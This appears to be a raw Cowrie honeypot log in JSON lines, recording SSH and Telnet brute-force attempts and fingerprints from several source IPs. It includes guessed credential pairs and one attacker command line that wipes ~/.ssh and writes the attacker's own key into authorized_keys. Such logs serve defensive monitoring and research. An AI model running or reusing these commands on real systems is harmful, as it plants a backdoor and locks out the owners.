{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37532,"dst_ip":"1.2.3.4","dst_port":22,"session":"66a95b78e5d0","protocol":"ssh","message":"New connection: 212.227.235.229:37532 (1.2.3.4:22) [session: 66a95b78e5d0]","sensor":"my-vps","timestamp":"2025-08-26T13:16:01.354087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:16:01.355217Z","src_ip":"212.227.235.229","session":"66a95b78e5d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:16:01.604604Z","src_ip":"212.227.235.229","session":"66a95b78e5d0"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant123","message":"login attempt [vagrant/vagrant123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:16:02.644467Z","src_ip":"212.227.235.229","session":"66a95b78e5d0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:16:03.899835Z","src_ip":"212.227.235.229","session":"66a95b78e5d0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60378,"dst_ip":"1.2.3.4","dst_port":22,"session":"5643df6c9767","protocol":"ssh","message":"New connection: 217.72.205.35:60378 (1.2.3.4:22) [session: 5643df6c9767]","sensor":"my-vps","timestamp":"2025-08-26T13:16:07.815341Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:16:07.816557Z","src_ip":"217.72.205.35","session":"5643df6c9767"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":33936,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cdd83b309dd","protocol":"ssh","message":"New connection: 139.19.117.131:33936 (1.2.3.4:22) [session: 7cdd83b309dd]","sensor":"my-vps","timestamp":"2025-08-26T13:16:33.967645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:16:33.968391Z","src_ip":"139.19.117.131","session":"7cdd83b309dd"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T13:16:33.986553Z","src_ip":"139.19.117.131","session":"7cdd83b309dd"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"42:44:05:ce:9c:c8:c4:8f:6e:06:8e:bf:f7:29:e9:0b","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCWhkY6489sVwwOkR+Lijjc4khNq8bPrXKNmTgtWE+pgO73hDoFeH/GvpZ7s0Fqbh+4FY6q+fj8+6/6hcYpG3JBiqIf8xB4w/aLX4eYYus7AuiHUOcvAGUfSl2WUu5wMAK+MphufTYehfYBZ7WNwZgE0FgS4cUYPgbyzuvbWGTaYgCNp/zE6u7zZK00wy2XaIO+Fw+IvmgI3dbmYbRu8QVN2QNKRYwHtl6j68CmEpSow2gQ5nSlx7vEWtgqqiOROWSXFKepCmOYS315ipnECeRNDpZz8hEKmL5zsxMSZPuvNtmC4PvRCg45XxvyuLYxhLZGscCdPCreHXnx1zZpQsqx37aR62InlK5Cy/UxEifXrIHusC/2KxKlBwwj/QecN0wpHGElcq39Qsz2gGvgrZS0p/C55D4J/ii7oDiNKzbaBp/H8SyZxINc2XULg20LSGvxlXG0r0cLnxHAv6WgRt3JX5iW0POj2hzXcf6/OnHbZOUEyPT95sxu8n9mDXOfptU=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 42:44:05:ce:9c:c8:c4:8f:6e:06:8e:bf:f7:29:e9:0b","sensor":"my-vps","timestamp":"2025-08-26T13:16:34.025429Z","src_ip":"139.19.117.131","session":"7cdd83b309dd"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"42:44:05:ce:9c:c8:c4:8f:6e:06:8e:bf:f7:29:e9:0b","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCWhkY6489sVwwOkR+Lijjc4khNq8bPrXKNmTgtWE+pgO73hDoFeH/GvpZ7s0Fqbh+4FY6q+fj8+6/6hcYpG3JBiqIf8xB4w/aLX4eYYus7AuiHUOcvAGUfSl2WUu5wMAK+MphufTYehfYBZ7WNwZgE0FgS4cUYPgbyzuvbWGTaYgCNp/zE6u7zZK00wy2XaIO+Fw+IvmgI3dbmYbRu8QVN2QNKRYwHtl6j68CmEpSow2gQ5nSlx7vEWtgqqiOROWSXFKepCmOYS315ipnECeRNDpZz8hEKmL5zsxMSZPuvNtmC4PvRCg45XxvyuLYxhLZGscCdPCreHXnx1zZpQsqx37aR62InlK5Cy/UxEifXrIHusC/2KxKlBwwj/QecN0wpHGElcq39Qsz2gGvgrZS0p/C55D4J/ii7oDiNKzbaBp/H8SyZxINc2XULg20LSGvxlXG0r0cLnxHAv6WgRt3JX5iW0POj2hzXcf6/OnHbZOUEyPT95sxu8n9mDXOfptU=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:16:34.026471Z","src_ip":"139.19.117.131","session":"7cdd83b309dd"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"42:44:05:ce:9c:c8:c4:8f:6e:06:8e:bf:f7:29:e9:0b","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCWhkY6489sVwwOkR+Lijjc4khNq8bPrXKNmTgtWE+pgO73hDoFeH/GvpZ7s0Fqbh+4FY6q+fj8+6/6hcYpG3JBiqIf8xB4w/aLX4eYYus7AuiHUOcvAGUfSl2WUu5wMAK+MphufTYehfYBZ7WNwZgE0FgS4cUYPgbyzuvbWGTaYgCNp/zE6u7zZK00wy2XaIO+Fw+IvmgI3dbmYbRu8QVN2QNKRYwHtl6j68CmEpSow2gQ5nSlx7vEWtgqqiOROWSXFKepCmOYS315ipnECeRNDpZz8hEKmL5zsxMSZPuvNtmC4PvRCg45XxvyuLYxhLZGscCdPCreHXnx1zZpQsqx37aR62InlK5Cy/UxEifXrIHusC/2KxKlBwwj/QecN0wpHGElcq39Qsz2gGvgrZS0p/C55D4J/ii7oDiNKzbaBp/H8SyZxINc2XULg20LSGvxlXG0r0cLnxHAv6WgRt3JX5iW0POj2hzXcf6/OnHbZOUEyPT95sxu8n9mDXOfptU=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 42:44:05:ce:9c:c8:c4:8f:6e:06:8e:bf:f7:29:e9:0b","sensor":"my-vps","timestamp":"2025-08-26T13:16:34.046795Z","src_ip":"139.19.117.131","session":"7cdd83b309dd"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"42:44:05:ce:9c:c8:c4:8f:6e:06:8e:bf:f7:29:e9:0b","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCWhkY6489sVwwOkR+Lijjc4khNq8bPrXKNmTgtWE+pgO73hDoFeH/GvpZ7s0Fqbh+4FY6q+fj8+6/6hcYpG3JBiqIf8xB4w/aLX4eYYus7AuiHUOcvAGUfSl2WUu5wMAK+MphufTYehfYBZ7WNwZgE0FgS4cUYPgbyzuvbWGTaYgCNp/zE6u7zZK00wy2XaIO+Fw+IvmgI3dbmYbRu8QVN2QNKRYwHtl6j68CmEpSow2gQ5nSlx7vEWtgqqiOROWSXFKepCmOYS315ipnECeRNDpZz8hEKmL5zsxMSZPuvNtmC4PvRCg45XxvyuLYxhLZGscCdPCreHXnx1zZpQsqx37aR62InlK5Cy/UxEifXrIHusC/2KxKlBwwj/QecN0wpHGElcq39Qsz2gGvgrZS0p/C55D4J/ii7oDiNKzbaBp/H8SyZxINc2XULg20LSGvxlXG0r0cLnxHAv6WgRt3JX5iW0POj2hzXcf6/OnHbZOUEyPT95sxu8n9mDXOfptU=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:16:34.048026Z","src_ip":"139.19.117.131","session":"7cdd83b309dd"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":48886,"dst_ip":"1.2.3.4","dst_port":22,"session":"e82805c02945","protocol":"ssh","message":"New connection: 167.99.49.89:48886 (1.2.3.4:22) [session: e82805c02945]","sensor":"my-vps","timestamp":"2025-08-26T13:16:41.071779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:16:41.072649Z","src_ip":"167.99.49.89","session":"e82805c02945"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:16:41.164335Z","src_ip":"167.99.49.89","session":"e82805c02945"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"mine","message":"login attempt [minecraft/mine] failed","sensor":"my-vps","timestamp":"2025-08-26T13:16:41.576968Z","src_ip":"167.99.49.89","session":"e82805c02945"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:16:42.671530Z","src_ip":"167.99.49.89","session":"e82805c02945"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:16:43.967831Z","src_ip":"139.19.117.131","session":"7cdd83b309dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34688,"dst_ip":"1.2.3.4","dst_port":23,"session":"b69c445410c4","protocol":"telnet","message":"New connection: 212.227.235.229:34688 (1.2.3.4:23) [session: b69c445410c4]","sensor":"my-vps","timestamp":"2025-08-26T13:16:50.432446Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:16:50.638487Z","src_ip":"212.227.235.229","session":"b69c445410c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:16:50.714528Z","src_ip":"212.227.235.229","session":"b69c445410c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59732,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c3104dd6d8f","protocol":"ssh","message":"New connection: 212.227.235.229:59732 (1.2.3.4:22) [session: 8c3104dd6d8f]","sensor":"my-vps","timestamp":"2025-08-26T13:17:09.672989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:17:09.673746Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:17:09.918609Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.login.success","username":"root","password":"zzidc2025","message":"login attempt [root/zzidc2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:17:10.936318Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:11.440764Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:17:11.441559Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:17:11.442889Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:11.688426Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:12.311415Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:17:12.312184Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:17:12.559420Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:12.560492Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60894,"dst_ip":"1.2.3.4","dst_port":22,"session":"f63efc46af98","protocol":"ssh","message":"New connection: 212.227.235.229:60894 (1.2.3.4:22) [session: f63efc46af98]","sensor":"my-vps","timestamp":"2025-08-26T13:17:12.803163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:17:12.803810Z","src_ip":"212.227.235.229","session":"f63efc46af98"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:17:13.049064Z","src_ip":"212.227.235.229","session":"f63efc46af98"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:17:14.072874Z","src_ip":"212.227.235.229","session":"f63efc46af98"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:15.321033Z","src_ip":"212.227.235.229","session":"f63efc46af98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35354,"dst_ip":"1.2.3.4","dst_port":22,"session":"2210410d22b3","protocol":"ssh","message":"New connection: 212.227.235.229:35354 (1.2.3.4:22) [session: 2210410d22b3]","sensor":"my-vps","timestamp":"2025-08-26T13:17:15.557536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:17:15.558383Z","src_ip":"212.227.235.229","session":"2210410d22b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:17:15.798234Z","src_ip":"212.227.235.229","session":"2210410d22b3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:17:16.798449Z","src_ip":"212.227.235.229","session":"2210410d22b3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:17.039953Z","src_ip":"212.227.235.229","session":"2210410d22b3"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:17.042336Z","src_ip":"212.227.235.229","session":"8c3104dd6d8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25397,"dst_ip":"1.2.3.4","dst_port":22,"session":"969d45d950c9","protocol":"ssh","message":"New connection: 212.227.125.160:25397 (1.2.3.4:22) [session: 969d45d950c9]","sensor":"my-vps","timestamp":"2025-08-26T13:17:23.145980Z"}
